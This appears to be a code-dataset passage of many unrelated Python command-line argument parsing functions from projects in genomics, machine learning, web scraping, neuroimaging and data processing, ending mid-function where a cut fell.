"def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def parse_args():\n parser = ArgumentParser(\n description=\"This is a script for auto apply ipex optimization.\"\n \"\\n################################# Basic usage ############################# \\n\"\n \"\\n 1. Apply ipex optimization with fp32 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex python_script args \\n\"\n \"\\n 2. Apply ipex optimization with bf16 data type\\n\"\n \"\\n >>> python -m intel_extension_for_pytorch.cpu.auto_ipex --dtype bfloat16 python_script args \\n\",\n formatter_class=RawTextHelpFormatter,\n )\n\n add_auto_ipex_params(parser, auto_ipex_default_enabled=True)\n\n # positional\n parser.add_argument(\n \"program\",\n type=str,\n help=\"The full path to the proram/script to be launched. 
\"\n \"followed by all the arguments for the script\",\n )\n # rest from the training program\n parser.add_argument(\"program_args\", nargs=REMAINDER)\n return parser.parse_args()", "def parse_args():\n parser = common_parser()\n parser.description = (\n \"Given a sequence dict, fasta index or a bed file, scatter over the \"\n \"defined contigs/regions. Each contig/region will be split into \"\n \"multiple overlapping regions, which will be written to a new bed \"\n \"file. Each contig will be placed in a new file, unless the length of \"\n \"the contigs/regions doesn't exceed a given number.\")\n\n parser.add_argument(\"-c\", \"--chunk-size\", type=int, default=1e6,\n metavar=\"SIZE\",\n help=\"The size of the chunks. The first chunk in a \"\n \"region or contig will be exactly length SIZE, \"\n \"subsequent chunks will SIZE + OVERLAP and the final \"\n \"chunk may be anywhere from 0.5 to 1.5 times SIZE \"\n \"plus overlap. If a region (or contig) is smaller \"\n \"than SIZE the original regions will be returned. \"\n \"Defaults to 1e6\")\n parser.add_argument(\"-m\", \"--minimum-bp-per-file\", type=int, default=45e6,\n help=\"The minimum number of bases represented within \"\n \"a single output bed file. If an input contig or \"\n \"region is smaller than this MINIMUM_BP_PER_FILE, \"\n \"then the next contigs/regions will be placed in the \"\n \"same file untill this minimum is met. Defaults to \"\n \"45e6.\")\n parser.add_argument(\"-o\", \"--overlap\", type=int, default=150,\n help=\"The number of bases which each chunk should \"\n \"overlap with the preceding one. Defaults to 150.\")\n parser.add_argument(\"-S\", \"--split-contigs\", action=\"store_true\",\n help=\"If set, contigs are allowed to be split up over \"\n \"multiple files.\")\n args = parser.parse_args()\n return args", "def parse_arguments():\n # shift away script name\n scriptname=sys.argv[0]\n shift()\n ncl_cmd=list()\n quali_cmd=list()\n id_cmd=list() \n while(len(sys.argv)>0):\n carg = sys.argv[0]\n shift()\n if(carg == \"--nucleotide\"):\n ncl_cmd = mungeArgs(sys.argv)\n elif(carg == \"--quality\"):\n quali_cmd = mungeArgs(sys.argv)\n elif(carg == \"--id\" ):\n id_cmd = mungeArgs(sys.argv)\n elif(carg in [\"-h\", \"--help\"]):\n usage()\n else:\n usage(error=True)\n # Excess arguments which are not processed \n if(len(sys.argv) > 0):\n sys.stdout.write(\"Excess arguments!\\n\")\n sys.stdout.flush()\n usage(error=True)\n\n # external modules rely on non-empty argv array, \n # re-append the script name as first command line argument\n sys.argv.append(scriptname)\n return (id_cmd, ncl_cmd, quali_cmd)", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed 
(default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_args():\n parser = argparse.ArgumentParser(description='Crawl an Android app store for apk files.')\n parser.add_argument('--store', dest='api', choices=['GooglePlay', 'F-Droid'], required=True,\n help='Specifies the store to crawl. At the moment only Google Play is supported.')\n parser.add_argument('--meta', dest='meta', required=False, action='store_const', default=False, const=True,\n help='If set, no apps will be downloaded, but the meta_data will be saved.')\n parser.add_argument('--basedir', dest='base_dir', type=str, default=os.getenv('HOME'),\n required=False, help='Specifies the base path for both logs and apk_downloads.')\n parser.add_argument('--credentials', dest='credentials', type=str, required=False, default=None,\n help='Specifies the path to a credential file in .toml format.')\n parser.add_argument('--limit', dest='limit', type=int, required=False, default=None,\n help='Specifies the maximum number of apks per category to download.')\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument('session', help='Session Label')\n ap.add_argument('-sd', '--subjects_dir', help='Subjects Dir',\n default='/tmp')\n return ap.parse_args()", "def parse_args():\n\n\t# Define the input parser\n\tdesc = \"computes long term temperature anomaly trend for the GHNC dataset\"\n\tepilog = \"\"\"\ndatarange input argument is of the format:\n\t\t YYYY[MM[DD]][:YYYY[MM[DD]]]\nWhere the date before the optional ':'' represents the lower bound of\nthe range and the optional date after the : represents the upper\nbound. The optional elements of the date default to the lowest possible\nvalue for the lower bound and to the maximum possible for the upper\none. 
For example,\n\t2006 is equivalent to 2006/01/01:2006/12/31\n\t2006/02 is equivalent to 2006/02/01:2006/02/28\n\"\"\"\n\n\tparser = argparse.ArgumentParser(description=desc, epilog=epilog,\n\t\t\t\t\t\tformatter_class=argparse.RawDescriptionHelpFormatter)\n\tparser.add_argument(\"daterange\",\n\t\t\t\t\t\thelp=\"range of dates to make available locally\")\n\tparser.add_argument('-t',\"--timeseries\",nargs=2,metavar=('lon','lat'),type=float,\n\t\t\t\t\t\thelp=\"plot timeseries for the lon lat pair of coordinates\")\n\tparser.add_argument('-r',\"--recompute\",default=False,action='store_true',\n\t\t\t\t\t\thelp=\"force recompute trend\")\n\n\treturn parser.parse_args()", "def parse_args():\n parser = ArgumentParser()\n parser.add_argument('-t', '--timer', action='store_true', \\\n help='Time the first random generation')\n parser.add_argument('-i', '--ibmq', default='', help='IBMQ token')\n parser.add_argument('-b', '--backend', default='', help='IBMQ backend')\n return parser.parse_args()", "def parseArguments():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Optional arguments\n parser.add_argument(\"-t\", \"--test\", help=\"Optionally test algorithm on subsample of the data. Set to 1 for testing\", type=int, default=0)\n\n parser.add_argument(\"--cores\", help=\"Optimized code for a server with a lot of RAM, set to the number of available cores\", type=int, default=40)\n\n\n # Print version\n parser.add_argument(\"--version\", action=\"version\", version='%(prog)s - Version 2.0') #version 1.0 is for the observations in June 2018\n #version 1.1 contains the optimizations made after the june observations (mainly the switch to stackmags)\n #version 1.2 changed sim class to NOT include the list of failed candidates (not qsos)\n #... 
copied changes made to crossval version\n #version 1.5 added check for duplicate quasars and remove them\n #version 1.6 new simulated quasars (december)\n ##-------------------\n #version 2.0: combined training of classifier and regressor, streamlined input\n #version 2.1: Tryied to updates excluded area to a little more than stripe 82 but decided not to keep it, so no change\n\n # Parse arguments\n args = parser.parse_args()\n\n return args", "def parse_args(args):\n parser = argparse.ArgumentParser(\n description=\"Lookup table generator for Image Comparison\")\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"lookuptable {ver}\".format(ver=__version__))\n parser.add_argument(\n \"-f\",\n \"--folder\",\n dest=\"imagefolder\",\n help=\"path to image folder\",\n type=str,\n metavar=\"STRING\")\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to INFO\",\n action=\"store_const\",\n const=logging.INFO)\n parser.add_argument(\n \"-vv\",\n \"--very-verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to DEBUG\",\n action=\"store_const\",\n const=logging.DEBUG)\n return parser.parse_args(args)", "def parse_arguments(raw_args=sys.argv[1:]):\n parser = optparse.OptionParser(\n usage=\"usage: %prog [OPTIONS] DOMAIN_NAME DOMAIN_CONFIG_FILE\",\n description=\"A tool for provisioning a Khan Academy CloudSearch \"\n \"domain.\")\n\n parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"If specified, DEBUG messages will be printed and more \"\n \"information will be printed with each log message.\")\n\n parser.add_option(\"--leave-temp-dir\", action=\"store_true\", default=False,\n help=\"If specified, the created temporary directory will not be \"\n \"deleted when the script exits.\")\n\n parser.add_option(\"-n\", \"--dry-run\", action=\"store_true\", default=False,\n help=\"If specified, no commands will actually be executed.\")\n\n parser.add_option(\"--no-reindex\", action=\"store_true\", default=False,\n help=\"If specified, will only update the config, without reindexing.\")\n\n options, args = parser.parse_args(raw_args)\n\n if len(args) != 2:\n parser.error(\"You must specify the name of the domain and a file \"\n \"containing the domain configuration.\")\n\n return (options, args[0], args[1])", "def parse_arguments():\n p = argparse.ArgumentParser(description='Prepare the dataset for use by neural models.')\n p.add_argument(\"json_file\", type=argparse.FileType('r'), help=\"json file with all the data\")\n p.add_argument(\"prefix\", type=str, help=\"prefix for all the generated files\")\n p.add_argument(\"data_type\", type=str, choices=[\"names\", \"comments\", \"nc\"],\n default=\"nc\", help=\"type of the information recorded in the dataset\")\n p.add_argument(\"labels\", type=str, choices=[\"PROG\", \"ALL\", \"TOP\"],\n default=\"PROG\", help=\"method by which to choose the labels for the dataset\")\n p.add_argument(\"-other_label\", type=str, required=False, default=\"\",\n help=\"label to use instead of all infrequent labels. \"\n \"This can be left blank to ignore infrequent labels altogether\")\n p.add_argument(\"-label_num\", type=int, default=100, required=False,\n help=\"Number of most frequent labels to keep. Works with label_choice=TOP\")\n p.add_argument(\"-min_prog_labels\", type=int, default=5, required=False,\n help=\"Minimal number of programs a label has to appear in for it to be included \"\n \"in the dataset. 
Works with label_choice=PROG\")\n p.add_argument(\"-test_prog_list\", type=argparse.FileType('r'), default=None, required=False,\n help=\"file with the list of programs in the test set (optional)\")\n\n return p.parse_args(sys.argv[1:])", "def parseArgs(args):\n parser = argparse.ArgumentParser(description = \"Scrapes baseball-reference.com for player statistics\")\n\n parser.add_argument(\"-d\", \"--domain\", help=\"domain to scrape for statistics. Default is baseball-reference.com\", nargs=1, default=[\"http://www.baseball-reference.com\"])\n parser.add_argument(\"-f\", \"--filename\", help=\"database file to store data in\", required=True, nargs=1, type=argparse.FileType(\"r+\"))\n parser.add_argument(\"-r\", \"--reset\", help=\"removes database before scraping all data from baseball-reference. Conflicts with -u. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"-u\", \"--update\", help=\"scrapes baseball-reference and adds all new information to the database. Conflicts with -r. One of -r and -u must be specified\", action=\"store_true\")\n parser.add_argument(\"--verbose\", help=\"enables verbose output\", action=\"store_true\")\n parser.add_argument(\"--version\", help=\"prints out version and exits\", action=\"version\", version=\"%(prog)s ({version})\".format(version=__version__))\n\n parsedArgs = parser.parse_args()\n\n if parsedArgs.reset == parsedArgs.update:\n parser.error(\"-r and -u are conflicting flags. Exactly one must be specified\")\n parser.print_help()\n\n return parsedArgs", "def parse_cmdline():\n\tparser = ArgumentParser(prog=\"FastP_QC.py\", description=\"\"\"Script collects stats from fastp jsons.\"\"\")\n\tparser.add_argument(\"-r1\", \"--r1_stats\", dest=\"r1_stats\", action=\"store\", required=True, help=\"Text file with r1 stats, from q30.py script.\")\n\tparser.add_argument(\"-r2\", \"--r2_stats\", dest=\"r2_stats\", action=\"store\", required=True, help=\"Text file with r2 stats, from q30.py script.\")\n\tparser.add_argument(\"-n\", \"--name\", dest=\"name\", action=\"store\", required=True, help=\"Sample name\")\n\targs = parser.parse_args()\n\treturn args", "def parse_args():\n parser = argparse.ArgumentParser(\n description='Run the destination IoT program (CTRL-C to exit)')\n\n parser.add_argument('-v',\n '--verbose',\n default=False,\n action='store_true',\n help='Print all debug logs')\n\n parser.add_argument('-p',\n '--port',\n metavar='<port number>',\n default=7777,\n type=int,\n help='Default: 7777')\n\n parser.add_argument('-a',\n '--address',\n metavar='<email_address>',\n nargs='*',\n help='Email address(es) to receive notifications')\n\n args = parser.parse_args()\n return args", "def _ParseArgs():\n usage = \"usage: %prog [options]\"\n parser = optparse.OptionParser(usage=usage)\n\n parser.add_option('--width', type='int',\n default=352,\n help=('Width of the YUV file\\'s frames. '\n 'Default: %default'))\n parser.add_option('--height', type='int', default=288,\n help=('Height of the YUV file\\'s frames. '\n 'Default: %default'))\n parser.add_option('--crop_height', type='int', default=32,\n help=('How much of the top of the YUV file to crop. '\n 'Has to be module of 2. Default: %default'))\n parser.add_option('--yuv_file', type='string',\n help=('The YUV file to be cropped.'))\n parser.add_option('--output_file', type='string', default='output.yuv',\n help=('The output YUV file containing the cropped YUV. 
'\n 'Default: %default'))\n options = parser.parse_args()[0]\n if not options.yuv_file:\n parser.error('yuv_file argument missing. Please specify input YUV file!')\n return options", "def parse_args(self, args):\n raise Exception(\"Not implemented\")", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument(\n '--host', dest='host', default=None,\n help='Host for XNAT. Default: env XNAT_HOST.')\n ap.add_argument(\n '-u', '--username', dest='username', default=None,\n help='Username for XNAT.')\n ap.add_argument('project', help='Project Label')\n ap.add_argument('session', help='Session Label')\n ap.add_argument(\n 'proc_suffix', help='Proc name suffix', nargs='?', default='')\n ap.add_argument(\n '-sd', '--subjects_dir', dest='subjects_dir',\n help='Subjects Directory',\n default=os.environ.get('SUBJECTS_DIR', '/tmp'))\n return ap.parse_args()", "def parse_args():\n help_text = \"\"\"\n Analyzer of the frequency of use of nouns in the headings of posts on hubr.com\n \"\"\"\n parser = argparse.ArgumentParser(\n description=help_text\n )\n parser.add_argument(\n '-p',\n '--pages',\n type=int,\n dest='page_count',\n default=PAGE_COUNT,\n help=f'Number of pages to parse, default is {PAGE_COUNT}.'\n )\n parser.add_argument(\n '-s',\n '--start',\n type=int,\n default=PAGE_START,\n dest='start_page',\n help=f'Start page number, default is {PAGE_START}.',\n )\n parser.add_argument(\n '-t',\n '--top',\n type=int,\n default=TOP_SIZE,\n dest='top_size',\n help=f'The size of the top noun, default is {TOP_SIZE}.',\n )\n\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input_path\", required=True)\n parser.add_argument(\"-c\", \"--config\", required=True)\n return parser.parse_args()", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Calculates A and Ea from Gaussian output files using GoodVibes. '\n 'List files to be analyzed, reactant(s) first and ending with the '\n 'transition structure. These can be listed on the command line or in '\n 'a file (each line listing a set of reactant(s) and transition '\n 'structure).')\n parser.add_argument(\"-d\", \"--out_dir\", help=\"A directory where output files should be saved. The default location \"\n \"is the current working directory.\", default=None)\n parser.add_argument(\"-f\", dest=\"freq_cutoff\", help=\"Cut-off frequency for both entropy and enthalpy (wavenumbers) \"\n \"(default = 0)\", default=\"0\")\n parser.add_argument(\"-l\", \"--list\", help=\"The location of the list of Gaussian output files. \"\n \"The default file name.\", default=None)\n parser.add_argument(\"-q\", \"--quasiharmonic\", help=\"Use the '-q' option in GoodVibes, which turns on turns on \"\n \"quasi-harmonic corrections to both entropy and enthalpy in the \"\n \"Gibbs free energy (qh-G(T)) output from GoodVibes. \",\n action='store_true')\n parser.add_argument(\"--temp\", help=\"Temperature in K for calculating \\u0394G. The default is the first \"\n \"temperature in 'temp_range' (if specified). If a value is given, the program \"\n \"will use the temperature closest to it in the temp_range.\", default=None)\n parser.add_argument(\"-ti\", \"--temp_range\", help=\"Initial temp, final temp, (and optionally) step size (K) for \"\n \"thermochemistry calculations. 
The default range is 300,600,30\",\n default=\"300,600,30\")\n parser.add_argument(\"-v\", \"--vib_scale\", help=\"Scaling factor to be used for vibrational frequencies. If not \"\n \"provided, the GoodVibes default value will be used.\",\n default=None)\n parser.add_argument(\"-p\", \"--plot\", help=\"Make a \\u0394G plot at the specified temp. The default is False.\",\n action='store_true')\n parser.add_argument(\"-pl\", \"--plot_labels\", help=\"Optional labels for \\u0394G plot. Enter as a list.\",\n default=None)\n parser.add_argument(\"-c\", \"--vibes_check\", help=\"In addition to standard checks always run (matching solvent, \"\n \"level of theory, stoichiometry, charge, multiplicity, and \"\n \"Gaussian versions), run files through GoodVibes '--check' before \"\n \"performing calculations. The default is False.\",\n action='store_true')\n parser.add_argument(\"-o\", \"--output_fname\", help=\"The name of the output file to be created. The default is the \"\n \"list name with the extension '.csv', or '{}' if no list name \"\n \"provided.\".format(DEF_OUT_FILE_NAME), default=None)\n\n parser.add_argument(\"-s\", \"--save_vibes\", help=\"Save the output from running GoodVibes in separate files, \"\n \"named with the Gaussian log file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n parser.add_argument(\"-t\", \"--tog_vibes\", help=\"Save the output from running GoodVibes in one file, \"\n \"renamed with the output file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n\n args = None\n try:\n args = parser.parse_known_args(argv)\n options = args[0]\n if not options.out_dir:\n options.out_dir = os.getcwd()\n # user can define a new directory as the output directory\n if not os.path.exists(options.out_dir):\n os.makedirs(options.out_dir)\n\n if options.output_fname:\n options.output_fname = os.path.abspath(os.path.join(options.out_dir, options.output_fname))\n elif options.list:\n options.output_fname = create_out_fname(options.list, ext='.csv', base_dir=options.out_dir)\n else:\n options.output_fname = create_out_fname(DEF_OUT_FILE_NAME, ext='.csv', base_dir=options.out_dir)\n\n if options.plot_labels:\n options.plot_labels = options.plot_labels.split(',')\n else:\n options.plot_labels = ['']\n\n if options.vib_scale:\n options.vib_scale = float(options.vib_scale)\n\n except (SystemExit, ValueError) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n # If user doesn't specify an input file, read from standard input. Since\n # encodings are the worst thing, we're explicitly expecting std\n parser.add_argument('-i', '--infile',\n type=lambda x: open(x, encoding=ENCODE_IN),\n default=io.TextIOWrapper(\n sys.stdin.buffer, encoding=ENCODE_IN)\n )\n # Same thing goes with the output file.\n parser.add_argument('-o', '--outfile',\n type=lambda x: open(x, 'w', encoding=ENCODE_OUT),\n default=io.TextIOWrapper(\n sys.stdout.buffer, encoding=ENCODE_OUT)\n )\n # Set the verbosity level for the logger. 
The `-v` option will set it to\n # the debug level, while the `-q` will set it to the warning level.\n # Otherwise use the info level.\n verbosity = parser.add_mutually_exclusive_group()\n verbosity.add_argument('-v', '--verbose', action='store_const',\n const=logging.DEBUG, default=logging.INFO)\n verbosity.add_argument('-q', '--quiet', dest='verbose',\n action='store_const', const=logging.WARNING)\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser('Reading Comprehension on BaiduRC dataset')\n parser.add_argument('--prepare', action='store_true',\n help='create the directories, prepare the vocabulary and embeddings')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--generate', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gentest', action='store_true',\n help='predict the answers for test set with trained model')\n parser.add_argument('--gpu', type=str, default='0',\n help='specify gpu device')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='Adam',\n help='optimizer type')\n train_settings.add_argument('--learning_rate', type=float, default=0.001,\n help='learning rate')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--dropout', type=float, default=0,\n help='dropout keep rate')\n train_settings.add_argument('--batch_size', type=int, default=128,\n help='train batch size')\n train_settings.add_argument('--epochs', type=int, default=10,\n help='train epochs')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--embed_size', type=int, default=128,\n help='size of the embeddings')\n model_settings.add_argument('--hidden_size', type=int, default=256,\n help='size of LSTM hidden units')\n model_settings.add_argument('--max_seq_len', type=int, default=50,\n help='max passage num in one sample')\n model_settings.add_argument('--max_gen_len', type=int, default=50,\n help='max length of passage')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--vocab_dir', default='../data/vocab/',\n help='the dir to save vocabulary')\n path_settings.add_argument('--model_dir', default='../data/models/',\n help='the dir to store models')\n path_settings.add_argument('--result_dir', default='../data/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='../data/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_path',\n help='path of the log file. If not set, logs are printed to console')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--zarr_dir',\n type=str,\n help='path to directory of zarr files',\n )\n parser.add_argument(\n '--tiff_dir',\n type=str,\n help='path to directory of tiff files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def ParseArguments():\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-f', '--file', help='Text file to be used (e.g. 
mem/sample_mem.txt)')\n parser.add_argument('--memsize', help='Memory size of generated memory')\n parser.add_argument('--memrange', help='Max range of memory in generated memory')\n parser.add_argument('--mempattern', help='Generated memory pattern focus (normal, loops, rep, random)')\n parser.add_argument('--cachesize', help='Cache size to be used')\n parser.add_argument('--linesize', help='Cache line size to be used')\n parser.add_argument('--mult', help='Run an entered number of simulations back-to-back')\n parser.add_argument('-t', '--test', help='Run tests to verify the simulator is functioning properly', action=\"store_true\")\n\n return parser.parse_args()", "def parse_args():\n p = argparse.ArgumentParser(\n description='Parse system logs, for fun or something')\n p.add_argument('-l', '--log', dest='log_file', help='The log file')\n p.add_argument('-f', '--filter', dest='filter', help='filter by daemon')\n return p.parse_args()", "def parse_args():\r\n desc = \"Check for the longest running requests in bookie\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n parser.add_argument('-l', '--log', dest='log',\r\n action='store',\r\n default=None,\r\n required=True,\r\n help=\"log file we're reading requests from\")\r\n\r\n parser.add_argument('-n', '--number', dest='count',\r\n action='store',\r\n default=10,\r\n type=int,\r\n required=False,\r\n help=\"how many urls do we wish to see, default 10\")\r\n\r\n\r\n args = parser.parse_args()\r\n return args", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse Diff Exp output files\")\n parser.add_argument(\"raw_file\", help=\"DE analysis output file (.tab).\")\n parser.add_argument(\"output_json\", help=\"Output JSON\")\n parser.add_argument(\"output_file\", help=\"Output file\")\n parser.add_argument(\"--gene_id\", help=\"Gene_IDs column name\", type=str)\n parser.add_argument(\"--fdr\", help=\"FDR column name\", type=str)\n parser.add_argument(\"--pvalue\", help=\"Pvalue column name\", type=str)\n parser.add_argument(\"--fwer\", help=\"FWER column name\", type=str)\n parser.add_argument(\"--logodds\", help=\"Log Odds column name\", type=str)\n parser.add_argument(\"--logfc\", help=\"logfc column name\", type=str)\n parser.add_argument(\"--stat\", help=\"Statistics column name\", type=str)\n return parser.parse_args()", "def arg_parse():\n p = ap.ArgumentParser()\n p.add_argument('infile',\n help='path to file containing objects')\n p.add_argument('n1',\n help='night 1')\n p.add_argument('n2',\n help='night 2')\n p.add_argument('observatory',\n help='Astropy name of observatory')\n return p.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", help=\"input file or pattern\", default=\"\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", help=\"output file or pattern\", default=\"\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action='store_true')\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbose\", action='store_true')\n parser.set_defaults(verbose=False)\n parser.set_defaults(debug=False)\n return parser.parse_args()", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file\", help=\"file with the cohort you want to check / fix\", type=str, required=True)\n parser.add_argument(\"-o\", \"--outdir\", help=\"where should the files and 
the result readme be stored?\", type=str, required=True)\n return parser.parse_args()", "def parse_args():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\", \"--input\", required=True, action=\"store\", dest=\"f_in\", help=\"input file\"\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n required=True,\n action=\"store\",\n dest=\"f_out\",\n help=\"stem of output file\",\n )\n\n parser.add_argument(\n \"-d\",\n \"--dir\",\n required=True,\n action=\"store\",\n dest=\"dir\",\n help=\"directory to save output files\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--threshold\",\n required=False,\n action=\"store\",\n dest=\"thres\",\n default=0.85,\n help=\"threshold for the scoring function\",\n )\n\n parser.add_argument(\n \"-l\",\n \"--language\",\n required=True,\n action=\"store\",\n dest=\"lang\",\n help=\"provide language in order to set stop words\",\n )\n\n parser.add_argument(\n \"-min\",\n \"--minimum\",\n required=False,\n action=\"store\",\n dest=\"min\",\n default=100,\n help=\"minimum number of occurrences to be considered as ngram\",\n )\n\n parser.add_argument(\n \"--trigram\",\n required=False,\n action=\"store_true\",\n dest=\"trigram\",\n help=\"extracting trigrams in addition to bigrams\",\n )\n\n return parser.parse_args()", "def parse_args():\n global Args\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n pars_simulation(subparsers)\n pars_analyze(subparsers)\n Args = parser.parse_args()", "def parse_arguments():\n\n parser = argparse.ArgumentParser(\n description=\"生成用户字符串识别的切分字符串\"\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n nargs=\"?\",\n help=\"The output directory\",\n default=\"output/\"\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n nargs=\"?\",\n help=\"When set, this argument uses a specified text file as source for the text\",\n default=\"\",\n required=True\n )\n parser.add_argument(\n \"-mi\",\n \"--min_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The minimum number of characters per line, Default is 3.\",\n default=3,\n\n )\n parser.add_argument(\n \"-ma\",\n \"--max_char_count\",\n type=int,\n nargs=\"?\",\n help=\"The maximum number of characters per line, Default is 20.\",\n default=20,\n )\n return parser.parse_args()", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum 
